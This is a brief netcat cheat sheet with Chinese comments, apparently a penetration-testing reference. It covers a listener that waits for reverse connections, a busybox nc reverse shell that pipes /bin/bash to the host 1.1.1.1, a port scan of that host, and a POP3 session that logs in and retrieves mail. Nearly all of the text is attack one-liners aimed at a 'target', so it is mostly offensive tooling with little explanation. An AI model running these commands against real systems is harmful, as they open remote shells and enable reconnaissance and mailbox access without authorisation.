# 监听本地 443 端口,等待反向连接(rlwrap用于支持历史命令)
rlwrap nc -nvlp 443
# 连接到目标 1.1.1.1 的 443 端口
nc -nv 1.1.1.1 443
# 使用 busybox nc 执行反向 shell(将/bin/bash通过管道发送到目标)
busybox nc 1.1.1.1 443 -e /bin/bash
# 扫描目标 1.1.1.1 的 1-1000 端口
nc -nvz 1.1.1.1 1-1000
# 连接到目标 1.1.1.1 的 110 端口(POP3),并执行认证命令
nc -nvC 1.1.1.1 110
user username
pass password
list
retr 1